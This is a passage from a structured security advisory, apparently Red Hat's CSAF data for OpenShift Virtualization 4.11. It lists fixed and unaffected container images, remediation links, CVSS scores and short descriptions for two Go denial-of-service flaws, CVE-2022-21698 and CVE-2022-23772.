"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-21698", }, { category: "external", summary: "RHBZ#2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-21698", url: "https://www.cve.org/CVERecord?id=CVE-2022-21698", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", }, { category: "external", summary: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", url: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", }, ], release_date: "2022-02-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", 